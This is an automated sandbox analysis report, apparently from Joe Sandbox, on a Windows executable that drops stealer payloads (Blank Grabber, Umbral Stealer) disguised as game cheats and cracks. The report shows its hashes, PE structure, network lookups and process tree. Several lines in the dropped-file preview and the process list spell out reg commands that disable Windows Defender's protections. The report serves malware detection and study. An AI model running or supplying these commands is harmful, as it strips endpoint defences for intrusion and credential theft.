                                                  SHA1:0FD836BB4BFC035FF35EBE0FB47E4693CEC9E8BA
                                                  SHA-256:841EB644979B3C640761762645C9CD26F9BB46E558EAEB7BF0C2A79E761878F4
                                                  SHA-512:1B66F11B3A3DEA1E6A8F4F7EE493437A41E30704D1C80048EFD245184A447FDE6ABF06FE45AF0663A72B30B657A7297554DF8C3AF7B36AE2E0DF21A5031A34E0
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................. .......0....@..............................................@...........................P..........X....................................................p......................................................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.reloc............... ..............@..P.rsrc...X............"..............@..P.....................$..............@..P........................................................................................................................................
                                                  Process:C:\Users\user\Desktop\wKj1CBkbos.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3135
                                                  Entropy (8bit):5.017771879220886
                                                  Encrypted:false
                                                  SSDEEP:96:5UKNozkU9yryxh2VokttSTKlAHlRFH4rPNJLoJ:bD0
                                                  MD5:4C35B71D2D89C8E8EB773854085C56EA
                                                  SHA1:EDE16731E61348432C85EF13DF4BEB2BE8096D9B
                                                  SHA-256:3EFEEAAABFD33FF95934BEE4D6D84E4ECB158D1E7777F6EECD26B2746991ED42
                                                  SHA-512:A6CCBB2913738CA171686A2DD70E96330B0972DADB64F7294AC2B4C9BB430C872ED2BCD360F778962162B9E3BE305836FA7F6762B46310C0AD4D6EF0C1CDAC8D
                                                  Malicious:true
                                                  Preview:reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protecti
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.983955645619261
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:wKj1CBkbos.exe
                                                  File size:13'565'952 bytes
                                                  MD5:e3a480a53d8b2c398a7642e1f4e84785
                                                  SHA1:7f8fa5e3dc9be9055f9202213be33460a1af1e09
                                                  SHA256:11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2
                                                  SHA512:b3fce5ac73b75fb70d6c798517426ee614b72f24236baf07752f1289a8ce78d74c3c1ec5168f1d8fbcaa5b7de072ef3175f895ac1a49379f716209df49d103e8
                                                  SSDEEP:393216:oJlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8t:obQpgssCKInwjJaMu
                                                  TLSH:32D6336731695346D0EEC77AC533BE8372F29F6B8980E5BD1889B9C41A36B81D507B03
                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x4020cc
                                                  Entrypoint Section:CODE
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                  DLL Characteristics:
                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:d59a4a699610169663a929d37c90be43
                                                  Instruction
                                                  push ebp
                                                  mov ebp, esp
                                                  mov ecx, 0000000Ch
                                                  push 00000000h
                                                  push 00000000h
                                                  dec ecx
                                                  jne 00007F8F9CB7442Bh
                                                  push ecx
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov eax, 0040209Ch
                                                  call 00007F8F9CB73EA0h
                                                  xor eax, eax
                                                  push ebp
                                                  push 00402361h
                                                  push dword ptr fs:[eax]
                                                  mov dword ptr fs:[eax], esp
                                                  lea edx, dword ptr [ebp-14h]
                                                  mov eax, 00402378h
                                                  call 00007F8F9CB74279h
                                                  mov eax, dword ptr [ebp-14h]
                                                  call 00007F8F9CB74349h
                                                  mov edi, eax
                                                  test edi, edi
                                                  jng 00007F8F9CB74666h
                                                  mov ebx, 00000001h
                                                  lea edx, dword ptr [ebp-20h]
                                                  mov eax, ebx
                                                  call 00007F8F9CB74308h
                                                  mov ecx, dword ptr [ebp-20h]
                                                  lea eax, dword ptr [ebp-1Ch]
                                                  mov edx, 00402384h
                                                  call 00007F8F9CB73A98h
                                                  mov eax, dword ptr [ebp-1Ch]
                                                  lea edx, dword ptr [ebp-18h]
                                                  call 00007F8F9CB7423Dh
                                                  mov edx, dword ptr [ebp-18h]
                                                  mov eax, 00404680h
                                                  call 00007F8F9CB73970h
                                                  lea edx, dword ptr [ebp-2Ch]
                                                  mov eax, ebx
                                                  call 00007F8F9CB742D6h
                                                  mov ecx, dword ptr [ebp-2Ch]
                                                  lea eax, dword ptr [ebp-28h]
                                                  mov edx, 00402390h
                                                  call 00007F8F9CB73A66h
                                                  mov eax, dword ptr [ebp-28h]
                                                  lea edx, dword ptr [ebp-24h]
                                                  call 00007F8F9CB7420Bh
                                                  mov edx, dword ptr [ebp-24h]
                                                  mov eax, 00404684h
                                                  call 00007F8F9CB7393Eh
                                                  lea edx, dword ptr [ebp-38h]
                                                  mov eax, ebx
                                                  call 00007F8F9CB742A4h
                                                  mov ecx, dword ptr [ebp-38h]
                                                  lea eax, dword ptr [ebp-34h]
                                                  mov edx, 0040239Ch
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5000 | 0x302 | .idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9000 | 0xcedc4c | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0x1c8 | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x7000 | 0x18 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  CODE | 0x1000 | 0x13b8 | 0x1400 | e5913936857bed3b3b2fbac53e973471 | False | 0.6318359375 | data | 6.340990548290613 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  DATA | 0x3000 | 0x7c | 0x200 | cef89de607e490725490a3cd679af6bb | False | 0.162109375 | Matlab v4 mat-file (little endian), numeric, rows 0, columns 4230400 | 1.1176271682252383 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  BSS | 0x4000 | 0x695 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata | 0x5000 | 0x302 | 0x400 | 3d2f2fc4e279cba623217ec9de264c4f | False | 0.3876953125 | data | 3.47731642923935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .tls | 0x6000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rdata | 0x7000 | 0x18 | 0x200 | 467f29e48f3451df774e13adae5aafc2 | False | 0.05078125 | data | 0.1991075177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                  .reloc | 0x8000 | 0x1c8 | 0x200 | 9859d413c7408cb699cca05d648c2502 | False | 0.876953125 | data | 5.7832974211095225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                  .rsrc | 0x9000 | 0xcedc4c | 0xcede00 | b71b638293214e43c1f14a9a85e81aa0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  RT_RCDATA | 0x936c | 0x39600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3982545275054466
                                                  RT_RCDATA | 0x4296c | 0xcb3600 | PE32 executable (GUI) Intel 80386, for MS Windows | | | 0.9421873092651367
                                                  RT_RCDATA | 0xcf5f6c | 0xc3f | ASCII text | | | 0.19138755980861244
                                                  RT_RCDATA | 0xcf6bac | 0x13 | ASCII text, with no line terminators | | | 1.4210526315789473
                                                  RT_RCDATA | 0xcf6bc0 | 0x14 | ASCII text, with no line terminators | | | 1.4
                                                  RT_RCDATA | 0xcf6bd4 | 0x14 | ASCII text, with no line terminators | | | 1.4
                                                  RT_RCDATA | 0xcf6be8 | 0x1 | very short file (no magic) | | | 9.0
                                                  RT_RCDATA | 0xcf6bec | 0x1 | very short file (no magic) | | | 9.0
                                                  RT_RCDATA | 0xcf6bf0 | 0x1 | very short file (no magic) | | | 9.0
                                                  RT_RCDATA | 0xcf6bf4 | 0x1 | very short file (no magic) | | | 9.0
                                                  RT_RCDATA | 0xcf6bf8 | 0x1 | very short file (no magic) | | | 9.0
                                                  RT_RCDATA | 0xcf6bfc | 0x1 | very short file (no magic) | | | 9.0
                                                  RT_RCDATA | 0xcf6c00 | 0x10 | data | | | 1.5
                                                  RT_RCDATA | 0xcf6c10 | 0x1 | very short file (no magic) | | | 9.0
                                                  RT_RCDATA | 0xcf6c14 | 0x38 | data | | | 1.0714285714285714
                                                  DLL | Import
                                                  kernel32.dll | GetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                                  kernel32.dll | WriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                                  shfolder.dll | SHGetFolderPathA
                                                  shell32.dll | ShellExecuteA
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Oct 30, 2024 12:37:08.499875069 CET | 49711 | 80 | 192.168.2.6 | 208.95.112.1
                                                  Oct 30, 2024 12:37:08.505393028 CET | 80 | 49711 | 208.95.112.1 | 192.168.2.6
                                                  Oct 30, 2024 12:37:08.505465031 CET | 49711 | 80 | 192.168.2.6 | 208.95.112.1
                                                  Oct 30, 2024 12:37:08.505666971 CET | 49711 | 80 | 192.168.2.6 | 208.95.112.1
                                                  Oct 30, 2024 12:37:08.511208057 CET | 80 | 49711 | 208.95.112.1 | 192.168.2.6
                                                  Oct 30, 2024 12:37:09.099817991 CET | 80 | 49711 | 208.95.112.1 | 192.168.2.6
                                                  Oct 30, 2024 12:37:09.110732079 CET | 49711 | 80 | 192.168.2.6 | 208.95.112.1
                                                  Oct 30, 2024 12:37:18.923015118 CET | 49758 | 80 | 192.168.2.6 | 208.95.112.1
                                                  Oct 30, 2024 12:37:18.928286076 CET | 80 | 49758 | 208.95.112.1 | 192.168.2.6
                                                  Oct 30, 2024 12:37:18.928375006 CET | 49758 | 80 | 192.168.2.6 | 208.95.112.1
                                                  Oct 30, 2024 12:37:18.928519011 CET | 49758 | 80 | 192.168.2.6 | 208.95.112.1
                                                  Oct 30, 2024 12:37:18.933789015 CET | 80 | 49758 | 208.95.112.1 | 192.168.2.6
                                                  Oct 30, 2024 12:37:19.535264969 CET | 80 | 49758 | 208.95.112.1 | 192.168.2.6
                                                  Oct 30, 2024 12:37:19.536235094 CET | 49758 | 80 | 192.168.2.6 | 208.95.112.1
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Oct 30, 2024 12:37:08.473795891 CET | 60718 | 53 | 192.168.2.6 | 1.1.1.1
                                                  Oct 30, 2024 12:37:08.481379986 CET | 53 | 60718 | 1.1.1.1 | 192.168.2.6
                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                  Oct 30, 2024 12:37:08.473795891 CET | 192.168.2.6 | 1.1.1.1 | 0xf608 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                  Oct 30, 2024 12:37:08.481379986 CET | 1.1.1.1 | 192.168.2.6 | 0xf608 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                  Oct 30, 2024 12:37:18.196654081 CET | 1.1.1.1 | 192.168.2.6 | 0xc482 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                  Oct 30, 2024 12:37:18.196654081 CET | 1.1.1.1 | 192.168.2.6 | 0xc482 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                                                  Oct 30, 2024 12:37:20.182543993 CET | 1.1.1.1 | 192.168.2.6 | 0xe427 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                  Oct 30, 2024 12:37:20.182543993 CET | 1.1.1.1 | 192.168.2.6 | 0xe427 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                                  • ip-api.com
                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  0 | 192.168.2.6 | 49711 | 208.95.112.1 | 80 | 4420 | C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Oct 30, 2024 12:37:08.505666971 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Oct 30, 2024 12:37:09.099817991 CET | 174 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 11:37:08 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 5
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 74 72 75 65 0a
                                                  Data Ascii: true


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  1 | 192.168.2.6 | 49758 | 208.95.112.1 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Oct 30, 2024 12:37:18.928519011 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Oct 30, 2024 12:37:19.535264969 CET | 174 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 11:37:18 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 5
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 74 72 75 65 0a
                                                  Data Ascii: true


                                                  Target ID:0
                                                  Start time:07:37:01
                                                  Start date:30/10/2024
                                                  Path:C:\Users\user\Desktop\wKj1CBkbos.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\wKj1CBkbos.exe"
                                                  Imagebase:0x400000
                                                  File size:13'565'952 bytes
                                                  MD5 hash:E3A480A53D8B2C398A7642E1F4E84785
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:07:37:02
                                                  Start date:30/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
                                                  Imagebase:0x1bc02440000
                                                  File size:235'008 bytes
                                                  MD5 hash:06129FFC46E854930CFCAA754CA1D487
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 84%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:07:37:02
                                                  Start date:30/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Primordial Crack.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Primordial Crack.exe"
                                                  Imagebase:0x400000
                                                  File size:13'317'632 bytes
                                                  MD5 hash:BBD6FFDB33259778F08704696A04891F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 92%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:07:37:05
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"wmic.exe" csproduct get uuid
                                                  Imagebase:0x7ff6da950000
                                                  File size:576'000 bytes
                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:07:37:05
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:07:37:05
                                                  Start date:30/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
                                                  Imagebase:0x400000
                                                  File size:13'304'832 bytes
                                                  MD5 hash:7DB5128F7A81CC1AF094D8898E79FF21
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 75%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:07:37:06
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:07:37:06
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:07:37:07
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:07:37:07
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:07:37:07
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
